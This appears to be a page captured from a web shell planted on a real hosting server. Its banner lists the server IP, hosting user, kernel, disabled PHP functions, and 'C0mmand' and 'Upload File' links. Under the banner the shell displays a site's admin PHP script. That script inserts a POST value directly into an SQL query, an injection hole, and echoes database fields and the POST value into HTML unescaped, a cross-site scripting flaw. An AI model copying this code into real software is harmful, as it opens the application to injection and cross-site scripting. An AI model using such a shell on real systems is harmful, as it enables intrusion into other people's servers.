|
Server IP : 217.21.85.138 / Your IP : 216.73.216.103 Web Server : LiteSpeed System : Linux in-mum-web906.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u915722082 ( 915722082) PHP Version : 7.4.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u915722082/public_html/sbm/../DOT/admin/db/../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
include "config.php";
session_start();
$sql="select * from pro_des where PID={$_POST["pid"]}";
$res=$con->query($sql);
if($res->num_rows>0)
{
echo "<h3>Descriptions</h3>";
echo "<p><a href='del_des?id={$_POST["pid"]}' class='btn btn-danger btn-xs pull-right'>Delete All</a><br></p>";
echo "<table class='table table-bordered'>";
echo "<tr>";
echo "<td>S.No</td>";
echo "<td>Title</td>";
echo "<td>Description</td>";
echo "<td>Delete</td>";
echo "</tr>";
$i=0;
while($row=$res->fetch_assoc())
{$i++;
echo "<tr><td>{$i}</td>";
echo "<td>{$row["DTITLE"]}</td>";
echo "<td>{$row["DES"]}</td>";
echo "<td><a href='del_des?did={$row["DID"]}' class='btn btn-danger btn-xs'>Delete</a></td>";
}
echo "</table>";
}
?>